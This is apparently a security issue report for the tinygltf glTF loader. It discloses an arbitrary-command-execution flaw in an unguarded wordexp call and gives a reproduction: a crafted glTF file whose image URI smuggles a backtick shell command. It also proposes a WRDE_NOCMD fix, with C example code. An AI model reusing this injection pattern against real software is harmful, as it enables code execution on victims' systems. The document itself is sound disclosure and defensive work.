Describe the issue
This is a security vulnerability. The wordexp call here allows arbitrary code execution:

Line 2640 in 0fa56e2
int ret = wordexp(quoted_path.c_str(), &p, 0);
To Reproduce
- OS: Linux
- Compiler, compiler version, compile options: Clang 13.0.1-6
$ git clone https://github.com/syoyo/tinygltf
$ cd tinygltf && make all
$ echo '{"images":[{"uri":"a`echo iamhere > poc`"}], "asset":{"version":""}}' > payload.gltf
$ ./loader_example payload.gltf
$ cat poc
iamhere
Expected behaviour
The echo iamhere > poc command should not be executed and the poc file should not be created in the CWD.
Additional context
This was found by OSS-Fuzz: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=49053
One potential fix here is to pass WRDE_NOCMD to wordexp, per https://man7.org/linux/man-pages/man3/wordexp.3.html.
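An added example, not tinygltf's code, showing the WRDE_NOCMD mitigation suggested above: the backtick payload from the reproduction is rejected with WRDE_CMDSUB instead of being executed, while an ordinary URI still expands. The helper name safe_expand and its rejection of inputs that split into more than one word are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>
#include <wordexp.h>

/* Expand `path` with command substitution disabled.
 * Returns 0 and copies the single expanded word into `out`,
 * WRDE_CMDSUB when the input tried `...` or $(...), another
 * wordexp error code on other failures, or -1 (assumed convention
 * for this example) when the input expanded to != 1 word. */
int safe_expand(const char *path, char *out, size_t out_len) {
    wordexp_t p;
    memset(&p, 0, sizeof p);

    /* WRDE_NOCMD: glibc returns WRDE_CMDSUB instead of running a shell.
     * Note that $VAR and ~ expansion are still performed. */
    int ret = wordexp(path, &p, WRDE_NOCMD);
    if (ret != 0) {
        /* Per the man page, only WRDE_NOSPACE leaves memory to free. */
        if (ret == WRDE_NOSPACE)
            wordfree(&p);
        return ret;
    }

    if (p.we_wordc != 1) {      /* unquoted whitespace split the path */
        wordfree(&p);
        return -1;
    }
    snprintf(out, out_len, "%s", p.we_wordv[0]);
    wordfree(&p);
    return 0;
}

int main(void) {
    char buf[256];
    /* Constructed input: the URI from the issue's payload.gltf. */
    const char *poc = "a`echo iamhere > poc`";
    int ret = safe_expand(poc, buf, sizeof buf);
    printf("poc uri -> ret=%d (%s)\n", ret,
           ret == WRDE_CMDSUB ? "WRDE_CMDSUB, rejected" : "unexpected");
    ret = safe_expand("texture.png", buf, sizeof buf);
    printf("plain uri -> ret=%d, out=\"%s\"\n", ret, buf);
    return 0;
}
```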